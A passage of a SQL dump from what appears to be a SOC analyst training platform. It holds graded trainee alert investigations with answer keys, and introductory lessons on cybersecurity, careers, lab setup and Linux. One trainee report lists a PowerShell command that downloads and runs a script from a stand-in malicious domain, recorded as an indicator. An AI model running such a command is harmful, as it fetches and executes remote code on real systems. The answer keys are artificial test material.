1/3/2026\\n**Verdict:** True Positive\\n\\n### Incident Overview\\nAlert triggered by suspicious activity classified as **Insider Threat**.\\n\\n### Key Findings & Artifacts\\n- IP: 192.168.32.201\\n\\n### Incident Response\\nActions taken to mitigate the threat:\\nReset Credentials, Block IP / Domain, Isolate Host\",\"conclusion\":\"This alert is classified as a True Positive based on the following findings:\\n\\n1. The identified artifacts (192.168.32.201) were analyzed and determined to be malicious.\\n\\n2. Impact Assessment: The threat was confirmed. Immediate containment measures were taken to prevent lateral movement.\\n\\n3. Recommended Actions: Continue monitoring the affected systems, review access logs, and consider password resets for affected accounts.\"},\"artifacts\":[{\"type\":\"IP\",\"value\":\"192.168.32.201\",\"link\":\"\",\"score\":\"\"}],\"analysis_answers\":{\"attack_category\":\"Insider Threat\",\"action_taken\":[\"Reset Credentials\",\"Block IP / Domain\",\"Isolate Host\"]},\"submitted_at\":\"2026-01-03T16:55:43.995Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', NULL, '2025-12-29 21:35:43', '2026-01-03 16:56:44', 0, NULL), (52, 54, 257, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\",\"reset_credentials\",\"block_ip\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"This alert is True Positive\\nDetection POWERSHELL-0012 correctly identified malicious activity, suspicious PowerShell execution and fileless malware pattern. Actions are warranted\",\"submitted_at\":\"2025-12-29T21:58:29.581Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Suspicious PowerShell execution with known malicious network communication.\",\"missed_items\":[\"Executive Summary\",\"Artifacts such as file hash and IP address\"],\"strengths\":\"Correctly identified the activity as malicious.\"}', NULL, '2025-12-29 21:46:51', '2026-01-02 02:40:31', 0, NULL), (53, 54, 256, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"Alert is True Positive, its a known phishing URL, SEG saw the link is on a blacklist and quarantined the mail. The inbound e-mail bever reached the user\'s inbox. \",\"submitted_at\":\"2025-12-29T22:36:14.618Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"The email contained a blacklisted URL linked to phishing, and the email was quarantined.\",\"missed_items\":[\"Actions Taken\",\"Analysis/Artifacts Found\",\"Headers\"],\"strengths\":\"Correctly identified the email as a phishing attempt and stated that it was quarantined.\"}', NULL, '2025-12-29 22:28:13', '2026-01-02 02:40:31', 0, NULL), (59, 34, 268, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"This is true positive , need to block IP address and hash \",\"submitted_at\":\"2025-12-31T13:11:32.499Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Key artifacts include the attachment hash \'3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\' and the source IP \'192.168.1.100\'.\",\"missed_items\":[\"attachment_hash\",\"source_ip\",\"analysis and actions taken\",\"executive summary\"],\"strengths\":\"Identified the incident as a true positive, accurately recognizing it as a phishing attempt.\"}', NULL, '2025-12-31 13:10:22', '2026-01-02 02:40:31', 0, NULL), (60, 34, 269, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"this is truepositive alert, end point has to isolate, block domain , hash etc. .\",\"submitted_at\":\"2025-12-31T14:34:55.159Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"The execution of BlackEnergy malware, involvement of suspicious file and process, and the details such as file hash, IP addresses, and the user\'s action.\",\"missed_items\":[\"file_hash\",\"file_path\",\"internal_ip\",\"external_ip\",\"associated_action steps\"],\"strengths\":\"The analyst correctly identified the alert as a true positive.\"}', NULL, '2025-12-31 13:11:32', '2026-01-02 02:40:31', 0, NULL), (65, 34, 270, 'investigating', NULL, NULL, NULL, NULL, NULL, '2025-12-31 14:34:55', '2025-12-31 14:34:55', 0, NULL), (67, 34, 304, 'graded', 80, 'Good work, but there are areas for improvement.\n\nRecommended actions you missed: Reset Credentials, Collect Forensics, Escalate to Tier 2', '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"block_hash\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"It is truepositive alert. We need to block URL/Doamin and IP address and hash. \",\"submitted_at\":\"2026-01-02T04:31:15.901Z\"}', '{\"verdict\":\"True Positive\",\"recommended_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"critical_artifacts\":[{\"type\":\"email\",\"value\":\"finance.partner@maliciousdomain.com\",\"osint_verdict\":\"malicious\"},{\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"osint_verdict\":\"malicious\"},{\"type\":\"url\",\"value\":\"http://maliciousdomain.com/securelogin\",\"osint_verdict\":\"malicious\"},{\"type\":\"ip\",\"value\":\"203.0.113.45\",\"osint_verdict\":\"malicious\"}]}', '2026-01-02 07:37:59', '2026-01-02 04:28:59', '2026-01-02 04:31:15', 0, NULL), (68, 34, 305, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-02 04:31:15', '2026-01-02 04:31:15', 0, NULL), (71, 34, 318, 'investigating', NULL, NULL, NULL, NULL, '2026-01-02 18:36:39', '2026-01-02 15:27:39', '2026-01-02 15:27:39', 0, NULL), (75, 34, 316, 'investigating', NULL, NULL, NULL, NULL, '2026-01-02 18:52:14', '2026-01-02 15:43:14', '2026-01-02 15:43:14', 0, NULL), (81, 34, 274, 'investigating', NULL, NULL, NULL, NULL, '2026-01-03 00:42:46', '2026-01-02 21:34:46', '2026-01-02 21:34:46', 0, NULL), (82, 54, 318, 'graded', 75, 'Good work, but there are areas for improvement.\n\nRecommended actions you missed: Close Alert (False Positive)\nUnnecessary actions selected: Reset Credentials', '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"reset_credentials\"],\"verdict\":\"false_positive\",\"conclusion\":\"Instigation confirmed benign activity on internal, known host \\\"internal-server\\\" (192.168.1.15). 15 failed login attempts to \\\"admin\\\" account on dst 192.168.1.100 were triggered by likely cause e.g., automated script misconfig, service account password expiry/rotation, or scheduled task with stale creds. No evidence of brute-force. Host verified clean via EDR scan/logs. Action taken (credential reset) was precautionary. No IOC\'s or anomalies post-review.\",\"submitted_at\":\"2026-01-03T17:06:09.611Z\"}', '{\"verdict\":\"False Positive\",\"recommended_actions\":[\"close_alert\"],\"critical_artifacts\":[{\"type\":\"ip\",\"value\":\"192.168.1.15\",\"osint_verdict\":\"internal\"}]}', '2026-01-03 20:06:39', '2026-01-03 16:56:39', '2026-01-03 17:06:09', 0, NULL), (83, 54, 315, 'graded', 100, 'Excellent investigation! You demonstrated strong analytical skills.', '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"Host compromised: WORKSTATION-01 (10.0.02) affected user: Jane.doe, Malware Identified: malware.exe-has b194 linked to known enterprise-targeting campaign. Rapid threat intelligence VirusTotal scan confirmed malicious hash. Risk level high. Immediate response actions host Isolation: WORKSTATION-01 quarantined from network-prevented lateral movement and data exfiltration. Malware Blocking: Malware hash globally blacklisted across all enterprise endpoints, Forensic Capture: Memory and disk imaging performed to preserve evidence. \",\"submitted_at\":\"2026-01-03T17:19:44.573Z\"}', '{\"verdict\":\"True Positive\",\"recommended_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"critical_artifacts\":[{\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"osint_verdict\":\"malicious\"}]}', '2026-01-03 20:14:54', '2026-01-03 17:07:54', '2026-01-03 17:19:44', 0, NULL), (84, 54, 249, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"True Positive\",\"executive_summary\":{\"report\":\"## Executive Report\\n**Date:** 1/3/2026\\n**Verdict:** True Positive\\n\\n### Incident Overview\\nAlert triggered by suspicious activity classified as **Web Attack**.\\n\\n### Key Findings & Artifacts\\n- URL: http://maliciousdomain.com/script.ps1\\n- Command: \\\"iex (New-Object Net.WebClient).DownloadString(\'http://maliciousdomain.com/script.ps1\')\\n- IP: 192.168.1.105\\n- Process: explorer.exe\\n\\n### Incident Response\\nActions taken to mitigate the threat:\\nIsolate Host, Block IP / Domain\",\"conclusion\":\"This alert is classified as a True Positive based on the following findings:\\n\\n1. The identified artifacts (http://maliciousdomain.com/script.ps1, \\\"iex (New-Object Net.WebClient).DownloadString(\'http://maliciousdomain.com/script.ps1\'), 192.168.1.105, explorer.exe) were analyzed and determined to be malicious.\\n\\n2. Impact Assessment: The threat was confirmed. Immediate containment measures were taken to prevent lateral movement.\\n\\n3. Recommended Actions: Continue monitoring the affected systems, review access logs, and consider password resets for affected accounts.\"},\"artifacts\":[{\"type\":\"URL\",\"value\":\"http://maliciousdomain.com/script.ps1\",\"link\":\"\",\"score\":\"\"},{\"type\":\"Command\",\"value\":\"\\\"iex (New-Object Net.WebClient).DownloadString(\'http://maliciousdomain.com/script.ps1\')\",\"link\":\"\",\"score\":\"\"},{\"type\":\"IP\",\"value\":\"192.168.1.105\",\"link\":\"\",\"score\":\"\"},{\"type\":\"Process\",\"value\":\"explorer.exe\",\"link\":\"\",\"score\":\"\"}],\"analysis_answers\":{\"attack_category\":\"Web Attack\",\"action_taken\":[\"Isolate Host\",\"Block IP / Domain\"]},\"submitted_at\":\"2026-01-03T17:35:55.420Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-01-03 20:31:08', '2026-01-03 17:21:08', '2026-01-03 17:36:55', 0, NULL), (86, 49, 428, 'investigating', NULL, NULL, NULL, NULL, '2026-01-05 01:39:51', '2026-01-04 22:30:51', '2026-01-04 22:30:51', 0, NULL), (87, 1, 476, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-05 03:22:25', '2026-01-05 03:22:25', 0, NULL), (88, 34, 496, 'investigating', NULL, NULL, NULL, NULL, '2026-01-06 03:35:33', '2026-01-06 00:29:33', '2026-01-06 00:29:33', 0, NULL), (89, 34, 476, 'graded', 86, 'Good work, but there are areas for improvement.\n\nRecommended actions you missed: Collect Forensics, Escalate to Tier 2\nConsider writing a more detailed conclusion.', '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\",\"artifact_5\",\"artifact_6\"],\"selectedActions\":[\"block_ip\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"This alert is true positive. \",\"submitted_at\":\"2026-01-06T00:54:10.521Z\"}', '{\"verdict\":\"True Positive\",\"recommended_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"critical_artifacts\":[{\"type\":\"ip\",\"value\":\"203.0.113.45\",\"osint_verdict\":\"malicious\"},{\"type\":\"email\",\"value\":\"attacker@maliciousdomain.com\",\"osint_verdict\":\"malicious\"},{\"type\":\"hash\",\"value\":\"a4b9c78cb6f1a2b3d4e5f6a7b8c9d0e1\",\"osint_verdict\":\"malicious\"},{\"type\":\"filename\",\"value\":\"important_document.rtf\",\"osint_verdict\":\"malicious\"}]}', NULL, '2026-01-06 00:53:10', '2026-01-06 00:54:10', 0, NULL), (90, 34, 477, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-06 00:54:10', '2026-01-06 00:54:10', 0, NULL), (91, 1, 525, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-06 01:49:25', '2026-01-06 01:49:25', 0, NULL), (92, 65, 244, 'investigating', NULL, NULL, NULL, NULL, '2026-01-06 10:10:49', '2026-01-06 07:00:49', '2026-01-06 07:00:49', 0, NULL), (93, 1, 530, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-06 19:45:51', '2026-01-06 19:45:51', 0, NULL), (94, 68, 530, 'graded', 95, 'Excellent investigation! You demonstrated strong analytical skills.\n\nUnnecessary actions selected: Reset Credentials\nAlways provide a conclusion explaining your verdict.', '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"\",\"submitted_at\":\"2026-01-07T16:11:48.286Z\"}', '{\"verdict\":\"True Positive\",\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"critical_artifacts\":[{\"type\":\"ip\",\"value\":\"203.0.113.5\",\"osint_verdict\":\"malicious\"},{\"type\":\"hash\",\"value\":\"3a2f4e6d2b2a4f5c6f9e8b7e4c1d2f3e\",\"osint_verdict\":\"malicious\"},{\"type\":\"filename\",\"value\":\"ASUSUpdate.exe\",\"osint_verdict\":\"suspicious\"}]}', '2026-01-07 19:18:30', '2026-01-07 16:08:30', '2026-01-07 16:11:48', 0, NULL), (95, 68, 531, 'graded', 100, 'Excellent investigation! You demonstrated strong analytical skills.\n\nUnnecessary actions selected: Reset Credentials, Escalate to Tier 2', '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"This report summarizes the Malicious payload, identifying key strengths in our response and critical areas needing improvement to address evolving threats like.\\nSuccessfully contained simulated ransomware, but identified gaps in endpoint detection coverage on 15% of legacy devices.\\nWhile no data was lost, potential downtime could have impacted critical operations.\\nRecommendations for improvement: 1. Upgrade EDR on legacy systems; 2. Develop updated playbooks for data exfiltration; 3. Conduct quarterly phishing simulations. \",\"submitted_at\":\"2026-01-07T16:40:25.941Z\"}', '{\"verdict\":\"True Positive\",\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"critical_artifacts\":[{\"type\":\"ip\",\"value\":\"203.0.113.15\",\"osint_verdict\":\"malicious\"},{\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"osint_verdict\":\"malicious\"}]}', NULL, '2026-01-07 16:11:48', '2026-01-07 16:40:25', 0, NULL), (96, 68, 532, 'graded', 100, 'Excellent investigation! You demonstrated strong analytical skills.\n\nUnnecessary actions selected: Escalate to Tier 2', '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"This report summarizes the [Event Name], identifying key strengths in our response and critical areas needing improvement to address evolving threats like [Threat Type]\\\".\\nKey Findings: Backdoor was detected.\\nBusiness Impact: While no data was lost, potential downtime could have impacted critical operations.\\nRecommendations (POA&M): 1. Upgrade EDR on legacy systems; 2. Develop updated playbooks for data exfiltration; 3. Conduct quarterly phishing simulations. \",\"submitted_at\":\"2026-01-07T16:43:10.336Z\"}', '{\"verdict\":\"True Positive\",\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"],\"critical_artifacts\":[{\"type\":\"ip\",\"value\":\"203.0.113.45\",\"osint_verdict\":\"malicious\"},{\"type\":\"username\",\"value\":\"compromised_user\",\"osint_verdict\":\"suspicious\"},{\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"osint_verdict\":\"malicious\"}]}', NULL, '2026-01-07 16:40:25', '2026-01-07 16:43:10', 0, NULL), (97, 68, 533, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-07 16:43:10', '2026-01-07 16:43:10', 0, NULL), (98, 34, 530, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-11 01:35:26', '2026-01-11 01:35:26', 0, NULL), (99, 34, 546, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-11 01:38:00', '2026-01-11 01:38:00', 0, NULL), (100, 34, 345, 'investigating', NULL, NULL, NULL, NULL, '2026-01-11 04:54:19', '2026-01-11 01:45:19', '2026-01-11 01:45:19', 0, NULL); -- -------------------------------------------------------- -- -- Table structure for table `investigation_notes` -- DROP TABLE IF EXISTS `investigation_notes`; CREATE TABLE `investigation_notes` ( `id` int(11) NOT NULL, `user_id` int(11) NOT NULL, `alert_id` int(11) NOT NULL, `note` text NOT NULL, `created_at` timestamp NULL DEFAULT current_timestamp() ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci; -- -------------------------------------------------------- -- -- Table structure for table `learning_paths` -- DROP TABLE IF EXISTS `learning_paths`; CREATE TABLE `learning_paths` ( `id` int(11) NOT NULL, `title` varchar(255) NOT NULL, `description` text DEFAULT NULL, `difficulty_level` enum('beginner','intermediate','advanced') NOT NULL, `estimated_hours` int(11) DEFAULT 0, `icon_url` varchar(255) DEFAULT NULL, `display_order` int(11) DEFAULT 0, `is_active` tinyint(1) DEFAULT 1, `created_at` timestamp NULL DEFAULT current_timestamp(), `updated_at` timestamp NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci; -- -- Dumping data for table `learning_paths` -- INSERT INTO `learning_paths` (`id`, `title`, `description`, `difficulty_level`, `estimated_hours`, `icon_url`, `display_order`, `is_active`, `created_at`, `updated_at`) VALUES (1, 'Pre-Security Fundamentals', 'Start your cybersecurity journey with essential IT and security foundations. Perfect for absolute beginners.', 'beginner', 120, NULL, 1, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07'), (2, 'Security Operations Basics', 'Build practical security operations skills with hands-on log analysis, packet inspection, and threat detection.', 'intermediate', 180, NULL, 2, 1, '2025-12-26 02:43:16', '2025-12-26 15:49:18'), (3, 'SOC Analyst Level 1', 'Master SIEM platforms, incident response, and become job-ready for SOC Analyst roles.', 'intermediate', 220, NULL, 3, 1, '2025-12-26 02:43:16', '2025-12-26 15:49:18'), (4, 'Advanced SOC & Threat Hunting', 'Advanced threat hunting, malware analysis, and specialized security operations.', 'advanced', 160, NULL, 4, 1, '2025-12-26 02:43:16', '2025-12-26 15:49:18'), (6, 'Threat Intelligence', 'Master the art of Cyber Threat Intelligence (CTI). Learn to collect, analyze, and disseminate intelligence to anticipate and prevent attacks.', 'intermediate', 40, NULL, 6, 1, '2025-12-29 13:30:44', '2025-12-29 13:30:44'), (9, 'Alert Investigation Specialist', 'Master the art of investigating specific security alerts. Deep dive into EDR, SIEM, Network, and Email analysis tools.', 'beginner', 0, NULL, 3, 1, '2025-12-26 17:59:30', '2025-12-26 17:59:30'); -- -------------------------------------------------------- -- -- Table structure for table `lesson_content` -- DROP TABLE IF EXISTS `lesson_content`; CREATE TABLE `lesson_content` ( `id` int(11) NOT NULL, `task_id` int(11) NOT NULL, `content` text NOT NULL, `content_type` enum('markdown','html') DEFAULT 'markdown', `reading_time_minutes` int(11) DEFAULT NULL, `created_at` timestamp NULL DEFAULT current_timestamp(), `updated_at` timestamp NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci; -- -- Dumping data for table `lesson_content` -- INSERT INTO `lesson_content` (`id`, `task_id`, `content`, `content_type`, `reading_time_minutes`, `created_at`, `updated_at`) VALUES (1, 1, '## What is Cybersecurity?\n\n**Cybersecurity** is the practice of protecting systems, networks, and programs from digital attacks. These cyberattacks are usually aimed at accessing, changing, or destroying sensitive information; extorting money from users; or interrupting normal business processes.\n\n---\n\n### The Evolution of Hacking\nTo understand where we are, we must look at where we came from.\n\n#### 1. The Era of Phreaking (1970s)\nBefore computers were networked, hackers targeted **phones**. \"Phreakers\" like John Draper (Captain Crunch) used a toy whistle that emitted a 2600Hz tone. This tone tricked the AT&T phone switches into giving free long-distance calls.\n* **Motivation**: Curiosity.\n\n#### 2. The Morris Worm (1988)\nRobert Morris wrote a script to gauge the size of the internet. A coding error made it propagate uncontrollably. It crashed 10% of the entire internet.\n* **Impact**: The first conviction under the Computer Fraud and Abuse Act.\n\n#### 3. The Script Kiddie Era (1990s-2000s)\nTools became public. You didn\'t need to know C code; you just needed to download \"Sub7\" or \"Back Orifice\". Defacements of websites were common.\n* **Motivation**: Fame / Notoriety.\n\n#### 4. The Era of Cybercrime (2010s-Present)\nHacking became a business. Organized crime groups (like Conti, LockBit) run \"Ransomware as a Service\". They have HR departments, helpdesks, and payroll.\n* **Motivation**: Money. Trillions of dollars lost annually.\n\n#### 5. Cyber Warfare (State Sponsored)\nNations (US, China, Russia, Israel, Iran) use cyber tools for espionage and sabotage.\n* **Stuxnet (2010)**: A worm that physically destroyed Iranian nuclear centrifuges. The first \"digital weapon\".\n\n---\n\n### Why is Cybersecurity Hard?\n1. **The Defender\'s Dilemma**: A defender must be right 100% of the time. An attacker only needs to be right ONCE.\n2. **Complexity**: Modern software has millions of lines of code. Bugs are inevitable.\n3. **The Human Factor**: You can have a $1 Million Firewall, but if Dave in Accounting clicks a link that says \"Free iPhone\", you are breached.\n\n### Key Terminology\n* **Threat**: The potential cause of an unwanted incident (e.g., A hacker, a hurricane).\n* **Vulnerability**: A weakness in a system (e.g., Weak password, unpatched Windows).\n* **Risk**: The likelihood of a Threat exploiting a Vulnerability. (`Risk = Threat x Vulnerability`).', 'markdown', 3, '2025-12-26 01:08:19', '2025-12-29 13:58:57'), (2, 2, '## Threats, Vulnerabilities, and Exploits\n\nThe \"Holy Trinity\" of InfoSec. You must master these definitions.\n\n### 1. Vulnerability (The Lock is Broken)\nA flaw or weakness in system security procedures, design, implementation, or internal controls.\n* **Software Vulns**: SQL Injection, Buffer Overflow.\n* **Hardware Vulns**: Meltdown/Spectre (CPU flaws).\n* **Human Vulns**: Gullibility (Phishing), Laziness (Weak passwords).\n* **CVE (Common Vulnerabilities and Exposures)**: The global ID system for vulns. e.g., `CVE-2021-44228` (Log4j).\n\n### 2. Threat (The Thief)\nAny circumstance or event with the potential to adversely impact operations.\n* **Adversarial Threats**: Hackers, Nation States, Insiders.\n* **Environmental Threats**: Floods, Earthquakes, Power Failure.\n* **Accidental Threats**: Users deleting the wrong database.\n\n### 3. Exploit (The Key)\nCode or a technique that takes advantage of a vulnerability.\n* **Zero-Day Exploit**: An exploit for a vulnerability that the vendor (e.g., Microsoft) does **not** know about yet. There is no patch. These are worth millions on the black market.\n* **Public Exploit**: Code available on Exploit-DB or GitHub.\n\n---\n\n### The Equation of Risk\n> **Risk = Threat × Vulnerability × Impact**\n\n* **Scenario A**:\n * Threat: High (Nation State).\n * Vuln: High (Unpatched Server).\n * Impact: High (Database with all customer SSNs).\n * **Result**: CRITICAL RISK.\n\n* **Scenario B**:\n * Threat: High.\n * Vuln: High.\n * Impact: Low (The server hosts the cafeteria menu).\n * **Result**: LOW RISK.\n\n**Risk Management** is about lowering one of these variables.\n* We can\'t lower the **Threat** (Hackers exist).\n* We can lower the **Vuln** (Patching).\n* We can lower the **Impact** (Network Segmentation, Backups).', 'markdown', 3, '2025-12-26 01:08:19', '2025-12-29 13:58:57'), (3, 3, '## Careers in Cybersecurity\n\nThe field is massive. It is not just \"Hacking\".\n\n### 1. The Blue Team (Defenders)\nThey build, monitor, and defend. 80% of jobs are here.\n* **SOC Analyst (Tier 1/2/3)**: The first line of defense. Monitors logs, triages alerts. \"The Firefighter\".\n* **Security Engineer**: Builds the tools. Configures Firewalls (Palo Alto), SIEMs (Splunk), and EDRs (CrowdStrike).\n* **Incident Responder (IR)**: The SWAT team. Called in when a breach is confirmed to kick the attacker out.\n* **Threat Hunter**: Proactively searches for threats that evaded the SOC.\n\n### 2. The Red Team (Offense)\nAuthorized hackers who test defenses.\n* **Penetration Tester**: Hired to break into a specific app or network to find bugs.\n* **Red Teamer**: Simulation of a full adversary (APT). They might phish employees, clone badges, or break windows.\n\n### 3. Engineering & GRC\n* **DevSecOps**: Writes secure code and builds security into the pipeline.\n* **GRC (Governance, Risk, Compliance)**: Policy writers. Auditors. They ensure the company follows laws (GDPR, HIPAA) and standards (ISO 27001). \"The Lawyers of Cyber\".\n\n---\n\n### Certificates vs Degrees\nCybersecurity is a meritocracy. Practical skills often outweigh degrees.\n* **Entry Level**: CompTIA Security+, Network+.\n* **Technical**: OSCP (PenTesting), BTL1 (Blue Team), CCNA (Networking).\n* **Management**: CISSP (The \"Gold Standard\" for HR filters, but less technical).\n\n### How to Start?\n1. **Learn Linux**: It is the OS of the internet.\n2. **Learn Networking**: You can\'t hack a network if you don\'t know how IP packets work.\n3. **Build a Lab**: Set up VirtualBox with Kali Linux and a vulnerable target (Metasploitable).', 'markdown', 3, '2025-12-26 01:52:34', '2025-12-29 13:58:57'), (4, 4, '\n## 🎯 Learning Objective\n\nUnderstand **Quiz: Cybersecurity Basics** and its role in modern cybersecurity operations.\n\n---\n\n## 📖 Core Concept\n\nQuiz: Cybersecurity Basics is a foundational element of security.\n\n### What is it?\nQuiz: Cybersecurity Basics involves:\n- **Identification**: Recognizing patterns\n- **Analysis**: Understanding impact\n- **Mitigation**: Reducing risk\n\n### Why it Matters\nWithout Quiz: Cybersecurity Basics, organizations cannot effectively defend against threats.\n\n---\n\n## ⚡ Quick Facts\n\n- **Criticality**: High\n- **Frequency**: Daily\n- **Impact**: Operational Security\n\n---\n\n## 🛠️ Analyst Workflow\n\n1. **Monitor**: Watch for indicators\n2. **Analyze**: Verify context\n3. **Escalate**: If confirmed threat\n\n---\n\n## 📝 Summary\n\nMastering **Quiz: Cybersecurity Basics** is essential for Level 1 SOC analysts.\n', 'markdown', 3, '2025-12-26 01:52:34', '2025-12-26 14:39:59'), (5, 5, '## Setting Up Your Lab\n\nYou cannot learn hacking by reading. You must **do**.\nA Home Lab is safe place to break things.\n\n### The Virtualization Hypervisor\nAllows you to run multiple Operating Systems on one physical computer.\n* **VirtualBox**: Free, Open Source. (Recommended).\n* **VMware Workstation Player**: Free for personal use. fast.\n\n### The Attack Box: Kali Linux\nA Debian-based Linux distribution pre-installed with 600+ hacking tools.\n* **Nmap**: Scanner.\n* **Metasploit**: Exploit Framework.\n* **Wireshark**: Packet Sniffer.\n* **Burp Suite**: Web Proxy.\n* *Download*: Get the \"VirtualBox Image\" from kali.org. Do not install the ISO unless you are comfortable.\n\n### The Victim Box: Metasploitable 2\nAn intentionally vulnerable Linux machine.\n* It has open ports, weak passwords, and old web apps.\n* **WARNING**: Never expose Metasploitable to the internet (Bridge Mode). Always use \"Host Only\" or \"NAT Network\" mode in VirtualBox. If you expose it, **you will be hacked**.\n\n### Network Modes\n1. **NAT**: VM creates a private network inside the host. Can access internet. Safe.\n2. **Bridged**: VM gets an IP from your home Router. It sits next to your laptop. Risky for vulnerable VMs.\n3. **Host-Only**: Isolated network. VM can only talk to Host and other VMs. Most Secure.\n\n### Lab Exercise\n1. Install VirtualBox.\n2. Import Kali Linux.\n3. Import Metasploitable.\n4. Set both to \"NAT Network\".\n5. Ping Metasploitable from Kali.', 'markdown', 3, '2025-12-26 01:52:35', '2025-12-29 13:58:57'), (6, 6, '## Linux Navigation\n\nLinux powers 90% of the internet\'s servers, 100% of supercomputers, and most hacking tools. If you can\'t use the terminal, you can\'t do cyber.\n\n### The File System Hierarchy\nLinux does not have `C:`. It starts at Root `/`.\n* `/` **(Root)**: The base.\n* `/home`: User directories. (e.g., `/home/baris`). Equivalent to `C:Users`.\n* `/etc`: Configuration files. (e.g., `/etc/passwd`).\n* `/var`: Variable data (Logs live in `/var/log`).\n* `/bin`: Binaries (Programs) like `ls`, `cat`.\n* `/tmp`: Temporary files. Cleared on reboot.\n\n### Basic Commands\n1. `pwd` (**Print Working Directory**): Where am I?\n * Output: `/home/kali`\n2. `ls` (**List**): Show files.\n * `ls -l`: Long listing (Permissions, Size, Owner).\n * `ls -a`: All files (Including hidden files starting with `.`).\n * `ls -la`: Hidden + Long. (Muscle memory).\n3. `cd` (**Change Directory**): Move.\n * `cd Downloads`: Go to Downloads.\n * `cd ..`: Go up one level.\n * `cd ~`: Go home.\n * `cd /`: Go to root.\n\n### Absolute vs Relative Paths\n* **Absolute**: Full address. Always works.\n * `cd /var/log/apache2`\n* **Relative**: Relative to where you are.\n * If you are in `/var`, you can type `cd log`.\n\n### Exercise\nOpen your terminal.\n1. Type `pwd`.\n2. Type `cd /etc`.\n3. Type `ls`. Look for `passwd`.\n4. Type `cd ..` to go back to root.', 'markdown', 3, '2025-12-26 02:06:45', '2025-12-29 13:58:57'), (7, 7, '## Touching Files\n\nCreating, Moving, and Destroying files.\n\n### Creating\n1. `touch file.txt`: Creates an empty file.\n2. `mkdir foldername`: Creates a directory (Make Directory).\n3. `echo \"Hello\" > file.txt`: Creates a file containing \"Hello\".\n\n### Reading\n1. `cat 